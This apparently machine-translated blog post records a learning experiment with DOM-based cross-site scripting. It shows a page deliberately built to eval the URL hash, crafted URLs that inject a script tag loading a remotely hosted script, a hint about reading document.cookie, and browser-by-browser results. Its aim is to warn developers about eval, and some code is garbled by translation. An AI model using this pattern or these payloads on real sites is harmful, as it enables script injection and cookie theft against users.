I have heard about XSS before, but yesterday I learned about the principle of XSS attack in the process of learning “NodeJS in A Simple way”, so I found the book “Web Front-end Hacking Technology Decryption” that I wanted to read for a long time, and found the XSS chapter of XSS attack script, so I had the following simple XSS attack experiment. ####index.html
<! DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>XSSdemo</title> </head> <script> eval(location.hash.substr(1)) </script> <body> </body> </html>Copy the code
Eval (location.hash.substr(1)) eval(location.hash.substr(1))
XSS. Js (XSS attack script, stored on qiniuyun:Ov6jc8fwp.bkt.clouddn.com/xss.js)
Alert (" Your website has been attacked by XSS!" )Copy the code
Key code: alert(” Your website has been attacked by XSS!” Cookies are often used as an entry point, and you can use escape(document.cookie) to retrieve sensitive information stored in the user’s Cookie, such as phone numbers, passwords, and so on.
How to attack?
Add the hash value to the URL of file xss. HTML to be accessed. #document.write(““)
For example: file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write (” < script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js > “)
In the real world, this paragraph file:///C:/Users/jack/Desktop/XSSdemo/ could be http://192.168.32.89:80/, http://192.16.32.89:8080/, real address. Complete forms such as: http://192.16.32.89:8080/index.html#document.write (” < script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js > “)
Can ##### attack Chrome? Enter it in Chrome
file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write(<script/src=//ov6jc8fwp.bkt.clouddn.com/xss.js>”)
Will be blocked by Chrome, screenshot below:
Why was it intercepted? Because Chrome’s filter defense mechanism prevents this from working, other browsers can be attacked.
##### So how do you attack FireFox? (Firefox 57.0 Quantum version) requires a simple tweak to the original attack code. eval(decodeURI(location.hash.substr(1))) The corresponding access link also changed to file:///C:/Users/jack/Desktop/XSSdemo/index.html#document.write (< script/src=http://ov6jc8fwp.bkt.clouddn.com/ xss.js>”)
XSS attacks FireFox successfully!As you can see, the XSS script was successfully written to index.html
Can #####IE be attacked? (Internet Explorer 11.726.15063.0) XSS attacks on Internet Explorer 11 succeed!
After attacking for so long, am I going to green, oh no, black someone else? NoNoNo, I’m trying to make my site more secure.
Eval () can be used to attack input code in XSS. For example: In this case the input point to the location. The hash. Substr (1), with a value of ‘document. Write (< script/src=ov6jc8fwp.bkt.clouddn.com/xss.js > “)’
Essentially eval (decodeURI (location) hash) substr (1))) Is actually performed the eval ‘(document. Write (` < script/src=ov6jc8fwp.bkt.clouddn.com/xss.js > “))
Simply put, eval() executes XSS cross-site attack scripts. Front-end engineers should be aware of the security risks associated with eval() during development.
In terms of browser love, I think Chrome has added a lot of points to its defense against XSS attacks, giving it another reason to push Chrome in the future.
There is a lot of knowledge about XSS attacks, what I have learned is just the tip of the iceberg, and I will continue to explore!
That’s it !
I am looking forward to communicating with you and making progress together. Welcome to join the technical discussion group I created which is closely related to front-end development:
- SegmentFault technosphere :ES new specification syntax sugar
- SegmentFault column: Be a good front-end engineer while you’re still young
- Zhihu column: Be an excellent front-end engineer while you are still young
- Github blog: Personal blog 233 while You’re Still Young
- Front-end development QQ group: 660634678
- excellent_developers
Strive to be an excellent front-end engineer!